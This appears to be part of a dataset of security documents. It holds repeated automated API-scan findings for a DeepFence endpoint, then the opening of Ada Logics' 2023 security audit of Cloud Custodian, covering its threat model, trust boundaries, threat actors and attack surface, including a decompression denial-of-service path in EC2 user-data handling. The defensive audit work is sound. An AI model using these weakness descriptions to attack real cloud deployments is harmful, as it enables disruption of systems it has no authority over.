Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1987\nScan Invalid Types\nSeverity ERROR\nhttps://deepfence.show/Endpoint\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 255\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1988\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# SoapUI is the best\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1989\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# SoapUI is the best\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1990" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Automation & Configuration", - "project_name": "Cloud Custodian", - "file_name": "Ada-Logics-security-audit-2023-report.pdf" - }, - "content": [ - { - "data": "Cloud Custodian Security Audit 2023\nSecurity Audit Report\n(Arthur) Sheung Chi Chan, Adam Korczynski, David Korczynski\n17 apr 2024Cloud Custodian Security Audit 2023 17 apr 2024\nContents\nAbout Ada Logics 3\nProject dashboard 4\nExecutive summary 5\nThreat model 6\nMain components in scope . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6\nCore package . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7\nCloud service providers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7\nSupporting tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7\nThird party components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8\nCloud Custodian policies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8\nPolicy validation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9\nPolicy continuous integration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9\nData flow for Cloud Custodian . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9\nEntry through Cloud event triggering . . . . . . . . . . . . . . . . . . . . . . . . . . . 11\nTrust Boundaries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13\nThreat actors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13\nAttack surface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14\nAttacker objectives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17\nPrivilege escalation in the cloud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17\nMess up with services and resources of the cloud . . . . . . . . . . . . . . . . . . . . . 17\nGain information from the cloud services and resources . . . . . . . . . . . . . . . . . 17\nFuzzing 18\nfuzz_actions_parser . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18\nfuzz_actions_process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18\nfuzz_actions_validate . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19\nfuzz_filters_parser . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19\nfuzz_filters_process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19\nfuzz_filters_validate . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19\nfuzz_gcp_actions_validate_process . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20\nfuzz_gcp_filters_validate_process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20\nfuzz_gcp_resources_process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20\nfuzz_query_parser . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20\nfuzz_resources_parser . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20\nCloud Custodian Security Audit 2023 1Cloud Custodian Security Audit 2023 17 apr 2024\nfuzz_resources_process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21\nfuzz_resources_validate . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21\nSLSA review 22\nFound issues 24\nUse of a broken or weak cryptographic hashing algorithm for sensitive data 25\nMitagation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26\nInsecure temporary file creation 27\nVulnerable code location . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27\nMitigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28\nMissing sanitisation in using Jinja2 library 29\nMitigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30\nUsing deprecated and insecure ssl.wrap_socket 31\nVulnerable code location . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31\nMitigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31\nRemark . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32\nIndex out of range in ARN parser 33\nMitigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33\nImproper URL substring validation can leak data 34\nMitigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35\nPossible DoS from attacker-controller Github account 36\nMitigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38\nPossible DoS from attacker-controller Github repository 39\nMitigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40\nPossible zip bomb from large S3 object 41\nMitigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42\nPrivilege escalation through chained Lambda functions in AWS 43\nCode for lambda function terminate_instance . . . . . . . . . . . . . . . . . . . . . . 45\nProof of concept . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45\nImpact . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47\nCloud Custodian Security Audit 2023 2Cloud Custodian Security Audit 2023 17 apr 2024\nAbout Ada Logics\nAda Logics is a software security company founded in Oxford, UK, 2018 and is now based in London.\nWe are a team of pragmatic security engineers and security researchers that work hands-on with code\nauditing, security automation and security tool development.\nWe are committed open source contributors and we routinely contribute to state of the art security\ntooling in the fuzzing domain such as advanced fuzzing tools like Fuzz Introspector and continuous\nfuzzing with OSS-Fuzz. For example, we have contributed to fuzzing of hundreds of open source\nprojects by way of OSS-Fuzz. We regularly perform security audits of open source software and make\nour reports publicly available with findings and fixes, and we have audited many of the most widely\nused cloud native applications.\nAda Logics contributes to solving the challenge of securing the software supply-chain. To this end, we\ndevelop the tooling and infrastructure needed for ensuring a secure software development lifecycle,\nand we deploy these tools to critical software packages. On the tooling and infrastructure side, we\ncontribute to projects such as the OpenSSF Scorecard project as well as the Sigstore projects like SLSA\nand Cosign.\nAda Logics helps some of the most exposed organisations secure their software, analyse their code\nand increase security automation and assurance, and if you would like to consider working with us\nplease reach out to us via our website.\nWe write about our work on our blog and maintain a YouTube channel with educational videos. You\ncan also follow Ada Logics on Linkedin and X.\nAda Logics ltd\n71-75 Shelton Street,\nWC2H 9JQ London,\nUnited Kingdom\nCloud Custodian Security Audit 2023 3Cloud Custodian Security Audit 2023 17 apr 2024\nProject dashboard\nContact Role Organisation Email\nAdam\nKorczynskiAuditor Ada Logics Ltd adam@adalogics.com\n(Arthur)\nSheung Chi\nChanAuditor Ada Logics Ltd arthur.chan@adalogics.com\nDavid\nKorczynskiAuditor Ada Logics Ltd david@adalogics.com\nKapil\nThangaveluCloud Custodian\nMaintainerCloud Custodian kapil@stacklet.io\nAmir\nMontazeryFacilitator OSTIF amir@ostif.org\nDerek Zimmer Facilitator OSTIF derek@ostif.org\nHelen Woeste Facilitator OSTIF helen@ostif.org\nCloud Custodian Security Audit 2023 4Cloud Custodian Security Audit 2023 17 apr 2024\nExecutive summary\nIn late 2023 Ada Logics conducted a security audit of Cloud Custodian. The audit was facilitated by\nthe Open Source Technology Improvement Fund (OSTIF) and funded by the Cloud Native Computing\nFoundation. Cloud Custodian is a command line tool that allows users to manage cloud resources\nacross multiple cloud ecosystems by way of yaml policies. Cloud vendors require developers to define\npolicies by way of programming languages such as Python, and developers will often need to write\npolicies specifically for a particular cloud environment. With Cloud Custodian, users can write their\ndesired policies in a cloud-agnostic format - yaml - and depend on Cloud Custodian to translate this\ninto effective, cloud-specific policies.\nAda Logics began the engagement by formalizing a threat model for Cloud Custodian. The threat model\nwas helpful to us as we audited the source code. Once we had initiated the threat model, we continued\niterating over it throughout the entire audit as we learned more about the project. With the first version\nof the threat model, we began the manual review. In this part of the audit, we looked at a range of\nthreats to Cloud Custodian. We also began work on setting up a fuzzing suite for Cloud Custodian,\nwhich included writing fuzzers for Cloud Custodian and settig up the infrastructure for the fuzzers to\nrun continuously.\nIn summary, during the engagement, we:\n\u2022Formalized a threat model of Cloud Custodian\n\u2022Audited Cloud Custodians code base for security vulnerabilities.\n\u2022Integrated Cloud Custodian into OSS-Fuzz.\n\u2022Wrote a targeted fuzzing suite for Cloud Custodian.\nCloud Custodian Security Audit 2023 5Cloud Custodian Security Audit 2023 17 apr 2024\nThreat model\nIn this section we present the findings from threat modelling Cloud Custodian. We first enumerate\nCloud Custodians main components, tools and dependencies. We then proceed to an overview of a\ncrucial part of Cloud Custodian: policies. After that, we introduce the data flow of a Cloud Custodian\ndeployment at a high level. Here, we show how data and trust travels through Cloud Custodian and\nwhere trust changes. Finally, we enumerate the threat actors that could impact the security of Cloud\nCustodian.\nEach aspect of the threat model gives a different perspective to Cloud Custodians security model; When\nwe later consider specific security issues found during the manual auditing goal, having enumerated\nthe threat actors allows us to consider potential security risks against an attacker. The threat actors\nallow us to ask questions such as \u201cwho has privileges to trigger this issue?\u201d . The data flow findings are\nhelpful for the process of auditing, ie. to identify particular exposed components of Cloud Custodian,\nas well as when considering the threat from a particular finding. The trust flow analysis locates the\nthreat actors and attack vectors that a given vulnerability is reachable to.\nThe Cloud Custodian policies are a core component of Cloud Custodians security model. We therefore\ngo into deeper detail with these in the threat model and consider them from different perspectives.\nThe threat model is intended to assist multiple audiences. First and foremost, the threat model helps\nthe auditors of this particular security audit. At a higher level, that translates to be helpful to other\nsecurity researchers that wish to review Cloud Custodians security posture independently of this\nsecurity audit conducted by Ada Logics. For this community, the threat model gives an advanced entry\ninto the internals of Cloud Custodian as well as a high-level view of Cloud Custodians threat model.\nSecondly, the threat model can be a perspective to the Cloud Custodian maintainers when assessing\ncommunity-based security disclosures; It helps consider the same angles of a vulnerability report as a\nsecurity researcher takes. Thirdly, the threat model can also be of interest for Cloud Custodian users\nthat notice unexpected behavior in their use cases. The root cause of such cases can be bugs or security\nvulnerabilities, and becfore disclosing these publicly, users can assess them from Cloud Custodians\nthreat model.\nMain components in scope\nCloud Custodians code base is roughly split into two high-level categories: 1) a list of core packages\nwith supporting tools and 2) providers for cloud services. The packages vary in maturity from sandbox\npackages or components under development to mature, production-grade packages. The sandbox and\ndevelopment packages were out of scope for the audit. The table below shows all the Cloud Custodian\ncomponents in scope for the audit.\nCloud Custodian Security Audit 2023 6Cloud Custodian Security Audit 2023 17 apr 2024\nCore package\nComponents Description\nc7n Core package for the cloud custodian project. It contains the cli.py and\ncommands.py to accept command line calls to the cloud custodian and act as\nthe front end of the tools. It also has different supporting classes to handle\nthe parsing and execution of requests or queries with the supporting\nschemas.\nc7n/actions Part of the policy handler, handles the actions to be performed on the filtered\ntarget services or components. It can be changed or simply queried.\nc7n/filters Part of the policy handler, it handles the choice requirement to filter out the\ntarget services or components to which this policy will apply.\nc7n/reports Part of the policy handler, it displays the report showing the result of the\nprevious policy execution with the given policy.\nc7n/resources Template schema and other configurations and controls classes for different\ncloud services actions, queries, and requests\nCloud service providers\nComponents Description\ntools/c7n_azure Custodian provider package to support Azure\ntools/c7n_gcp Custodian provider package to support GCP\ntools/c7n_kube Custodian provider package to support Kubernetes\ntools/c7n_oci Custodian provider package to support OCI\ntools/c7n_tencentcloud Custodian provider package to support Tencent cloud\ntools/c7n_left Tool to evaluate policies with chosen cloud services without actually\nexecuting them\nSupporting tools\nCloud Custodian Security Audit 2023 7Cloud Custodian Security Audit 2023 17 apr 2024\nComponents Description\ntools/c7n_mailer Tool to handle message relay and mailing service across different cloud\naccounts and services\ntools/c7n_policystream Tool to manage and control policies changing history with version control\nThird party components\nComponents Description\nPython poetry Package and dependencies management library\nCloud service API Cloud platform service API for supporting cloud environment, like BOTO3 for\nAWS.\nCloud Custodian policies\nThe core functionality of Cloud Custodian is translation of into YAML commands applicable for different\ncloud enviroments. Users pass their YAML policies to Cloud Custodian, and Cloud Custodian deploys\nthe policy using a scripting language suited for the users cloud environment.\nPolicies are declarative using YAML files that follow a predefined schema predefined and performs some\nactions on resources on the cloud servers that match certain criteria. The action can be immediate\nactions, scheduled activity or policy rules to be enforced. Different actions require different levels of\npermissions and roles depending on the users cloud environment.\nEach cloud provider uses different mechanisms for deploying this type of functionality into their\nplatforms. Learning these mechanisms takes time and effort, and users will have to learn these\nmechanisms for each cloud provider they use. Cloud Custodian abstracts these mechanisms into a\nunified approach supporting different cloud platforms, allowing Cloud Custodian users to use the\nsame declarative approach for all support cloud platforms.\nThe main purpose of Cloud Custodian is to use a unified language to perform policy enforcement and\nactions on the cloud services without the need to develop specific scripts and execution requests\nthrough different cloud service APIs of different cloud providers. In general, Cloud Custodian provides\nan abstraction and abstracts basic syntax of resources, filters, actions, API calls, business logic, and\nother cloud features into declarative YAML-based policies.\nCloud Custodian Security Audit 2023 8Cloud Custodian Security Audit 2023 17 apr 2024\nPolicy validation\nAn important part of Cloud Custodian is to parse policies according to schema to different resource fil-\nters and actions to the cloud service. The correctness and security of policy parameters and definitions\nare important factors in maintaining functional and security-relevant expectations on Cloud Custodian\nto properly and securely translate YAML-based policies into cloud scripts. The major interpretation\nand translation of Cloud Custodian are located in the PolicyLoader class. It takes care of the policy\ninterpretation according to the schema. It also complies with the policies to the permissions and\nroles of the CLI user pushing the policies. In addition, it also has a validation process to ensure the\npolicies are fulfilling the needed settings of the schema and that they do not contain illegal injections\nor characters in the provided settings.\nPolicy continuous integration\nCloud Custodian provides webhood for continuous integration from version control like git repository.\nIt can be added to the Cloud Custodian CLI in the cloud services to activate webhook monitoring to a\ngit repository. Whenever there are new or updated policies being merged. It will trigger the webhook\nand upload the policies to the policies storage in the cloud after validating the policies. It will then\napply to the cloud service if the permissions and roles are allowed. The security responsibility may\npass partly to the git repository management to only allow certain people to merge the policies and\nalso requires checking of possible injections or unwanted actions in those policies. Besides, there are\nalso additional uses of webhooks. Webhook. Periodic policies with webhook action type could be\nadded to Cloud Custodian to point to some URL or repository location. HTTP requests are initialised to\nretrieve resources or filtering information from the URL or repository when the policies are processed.\nNo new policies need to be deployed if the resource status or filtering criteria are changed. This could\nbe applied to cloud servers with frequent policies, resources or configuration changes.\nData flow for Cloud Custodian\nIn this section we present the dataflow of Cloud Custodian.\nA high-level overview of dataflow and trustflow in Cloud Custodian looks as such:\nPolicy developers develop Cloud Custodian policies according to existing schemas in the Cloud Cus-\ntodian service. CLI users retrieve those policies and apply them through Cloud Custodian CLI for\nimmediate or periodic plans, rules or actions on filtered resources. The CLI users need to have enough\npermissions and roles on the target resources in order to apply those policies in the cloud servers.\nIn addition to using existing schemas, Cloud Custodian allows custom schemas for uncovered cloud\nCloud Custodian Security Audit 2023 9Cloud Custodian Security Audit 2023 17 apr 2024\nFigure 1: Data flow for Cloud Custodian from CLI entry point\nCloud Custodian Security Audit 2023 10Cloud Custodian Security Audit 2023 17 apr 2024\nservices API combinations, that is, if Cloud Custodian adopters have a specific use case to their need,\nthey can write their own schemas.\nWhen a user or an automated service (\u201cGithub Repository\u201d in the diagram) deploy policies, the Policy\nValidator validates them for correctness of the policies and that the CLI users permissions correspond\nto the permissions in the schemas. After the Policy Validator has validated a policy, Cloud Custodian\npolicy handlers translate the valid policies to different types of cloud service requests, target filters\nor lambda functions and push them to the cloud services storage and register triggering events or\nexecute them immediately. Depending on the actions from the policies, the cloud server may store\npolicies as periodic events, or perform immediate actions. Sometimes it will also enable continuous\nlogging or returning the current snapshot data of the cloud servers on request or storing them in the\nCloud bucket. The cloud admin can control the stored policies and also the IAM roles for both the\npolicies and the CLI users that could deploy policies. Lastly, If need be, auditors can audit the logs and\nsome long term triggering events of policies to ensure it complies with the consumers internal or legal\nregulations.\nEntry through Cloud event triggering\nIn this section we cover Cloud Custodians event-based triggering of policies.\nAt a high level, Cloud Custodian supports three types on invocations besides directly invoking a\npolicy:\n1. Event-triggered policies When an event-triggered policy runs through Cloud Custodian CLI, it\nwill register event filterings in the given cloud service with certain patterns on the CloudWatch event\nbus. When a change happens on resources or services, the CloudWatch bus will stream a System\nevent to registered Lambda services, if the patterns filter is matching, the lambda functions will be\ninvoked. This kind of policy deployment allows Cloud Custodian to deploy translated actions into\nlambda functions and store them in the cloud service. The functions are then registered to be invoked\nwhen a certain CloudWatch Events API has been called. This is done by pattern filtering in the Cloud\nCustodian policies and is translated to lambda functions that determine if the streamed system event\nmatches the invocation requirements of the functions.\n2. Periodic-triggered policies Periodic-triggered policies are similar to event-triggered policies in\nwhich the lambda functions invocation is also triggered by CloudWatch Event API. But instead of trig-\ngering based on certain resources or service changes status, Cloud Custodian registers a periodic event\nin the CloudTrail to periodically send triggering requests to CloudWatch Event API and trigger a new\nCloud Custodian Security Audit 2023 11Cloud Custodian Security Audit 2023 17 apr 2024\nsystem event. This kind of periodic registration could also be filtered by patterns and resources/services\ntargets, which could be configured by the Cloud Custodian policies.\n3. Config rules triggered policies Besides the above two types of event triggering lambda function\ninvocation, there is an additional config rules triggered policies. These types of policies trigger the\ninvocation of stored lambda functions when a certain service or resource configuration has been made\non the cloud services. The policies register a certain config rules monitoring in the cloud services,\nwherever there is a configuration change, it will match the changes with the rules registered and invoke\nthe target lambda functions if the rules match.\nFigure 2: Data flow for Cloud Custodian to register triggering criteria for policies\nOnce a policy has been translated into a lambda function on a cloud platform, the Cloud Custodian\nuser can set up their environment in such a manner that the lambda function gets invoked when an\nevent takes place. In the case of AWS, users can for example use the AWS CloudTrail, CloudWatch and\nconfig rules services to deploy event-triggered lambda functions in their cloud. The translated lambda\nfunctions are stored in the AWS Lambda Services with roles and permission enforced on the invocation\nCloud Custodian Security Audit 2023 12Cloud Custodian Security Audit 2023 17 apr 2024\nof those stored lambda functions. There are 3 types of ways supported by Cloud Custodian to trigger\nthe events. But it is also important to remark that once the lambda functions have been created and\ndeployed to the AWS lambda services, any IAM roles of users or triggered events match the one enforced\non those lambda functions, the lambda functions would be invoked. That opens a possibility that a\nlambda function deployed through this setting through Cloud Custodian may trigger an unexpected\nevent if it matches some of the events or configuration rules. Users can perform additional monitoring\nof the execution and triggering of these stored lambda functions can be done by specifying monitoring\nand reporting options to the CloudTrails through Cloud Custodian policies, then log or other metrics\nare stored in S3 Bucket and could be audited or viewed in a later stage.\nTrust Boundaries\nAs the Cloud Custodian is installed in the management services of the cloud servers, the CLI users\ncertainly need to connect to the target cloud servers to execute the policies. Thus the policies are\nsurely going through the network boundary from the local environment of the CLI users to the remote\ncloud management servers with Cloud Custodian installed. The other possible network boundary\nis the boundary between the Cloud Custodian and the target cloud services. Although they should\nbe located in the same cloud network which could be manageable by the same cloud management\nconsole, the management server and the target cloud services may be located in different subnetworks.\nThat creates another possible network boundary.\nThreat actors\nCloud custodian is assumed to be run in a cloud console where all the actors should be either trusted\nor controlled by the Cloud IAM service.\nThreat Actor DescriptionLevel of\ntrust\nCLI Users Users that push policies to cloud services to perform actions on the filtered\ntarget resources with their own IAM rolesHigh\nCloud\nAdminsUsers that monitor and manage the cloud server where Cloud Custodian is\nrunning.Full\nPolicy\nDevelopersUsers that create Cloud Custodian policies to be deployed to the cloud\nserver.High\nSchema\nDevelopersUsers that create schema or plugins to extend the functionality of Cloud\nCustodian.Low\nCloud Custodian Security Audit 2023 13Cloud Custodian Security Audit 2023 17 apr 2024\nThreat Actor DescriptionLevel of\ntrust\nAuditor Users to monitor and audit logs, policy status, periodic events and rules to\nensure overall security and accuracy of the policy enforcement.Low\nOther cloud\nusersSome Cloud Custodian policies may depending on other cloud services or\nevents. Thus other cloud users with different IAM roles that control some\ncloud services or events could trigger some stored Cloud Custodian policies.Low\nAttack surface\nIn this section we present Cloud Custodians attack surface.\nThe attack surface represents the entrypoints into a system that an attacker could utilize to compro-\nmise the system. The attack surface describes both the known and expected entrypoints as well as\nunexpected or unintended entrypoints. Delineating the attack surface is helpful in understanding the\ntypes of threats and threat actors that could negatively impact the system. In this section we present\nthe attack surface of Cloud Custodian; Later in the audit, we use the findings from the threat modelling\ndetailing the attack surface in the manual auditing goal of the audit.\nA fundamental property of Cloud Custodians security model is that it is deployed in a cloud environment\nsuch as AWS, Azure, Google Cloud and Kubernetes. Cloud Custodian inherits substantial parts of the\nsecurity model of these platforms. As such, these platforms also represent an attack surface for Cloud\nCustodian; If there are vulnerabilities in the underlying platform, Cloud Custodian can be vulnerable\nto these as well. In other words, if an attacker can compromise the underlying cloud platform, Cloud\nCustodian has no or few defense mechanisms between itself and the cloud platform. During our\nanalysis of Cloud Custodian, we found several indicators that Cloud Custodian accepts this inherited\nattack surface. For example, Cloud Custodian decompresses the user data of EC2 instances without\nchecking its size or buffering the output (Line 817-818 below):\nhttps://github.com/cloud-custodian/cloud-custodian/blob/\n50d9f139de4a78aa32766f86f64e438cf7a8158a/c7n/resources/ec2.py#L803-L821\n803 def process_instance_set(self, client, resources):\n804 results = []\n805 for r in resources:\n806 ifself.annotation not in r:\n807 try:\n808 result = client.describe_instance_attribute(\n809 Attribute= 'userData ',\n810 InstanceId=r[ 'InstanceId '])\n811 except ClientError as e:\nCloud Custodian Security Audit 2023 14Cloud Custodian Security Audit 2023 17 apr 2024\n812 ife.response[ 'Error ']['Code '] == '\nInvalidInstanceId.NotFound ':\n813 continue\n814 if'Value 'not in result[ 'UserData ']:\n815 r[self.annotation] = None\n816 else :\n817 r[self.annotation] = deserialize_user_data(\n818 result[ 'UserData ']['Value '])\n819 ifself.match(r):\n820 results.append(r)\n821 return results\nCluster users with lower privileges can control EC2 instances and craft a malicious EC2 instance with\nuser data that decompresses into a large blob size would cause denial of service of Cloud Custodian,\nsince it would read the decompressed blob into memory. Cloud Custodian does not guard against\nthis attack but is also not vulnerable to it, because the limit of the user data of EC2 instances on the\nunderlying platform - AWS - is 16KB. As such, to cause a denial of service, an attacker needs to find a\nway to circumvent the restriction on AWS\u2019s max allowed size on EC2 user data.\nThis is an example of how Cloud Custodian integrates into the underlying platform to use their hard-\nening in its own security posture. There are pros and cons to this. On the pros side, Cloud Custodian\nbenefits from the security work made on the cloud platforms. Leaving out hardening mechanisms and\nrelying on the hardening made by the cloud platforms avoids bloat of the Cloud Custodian code base.\nFurthermore, Cloud Custodian avoids hardening on an attack vector that is expensive for attackers to\ncompromise through. On the cons side, if an attacker can compromise the underlying cloud platform,\nthey have a large attack surface available and can cause a lot of havoc for Cloud Custodian users. In\naddition, Cloud Custodian is susceptible to issues arising from unexpected or unnoticed changes in\nthe resource limits and sanitization for cloud resources.\nAnother attack vector is by way of cluster resources, ie. by 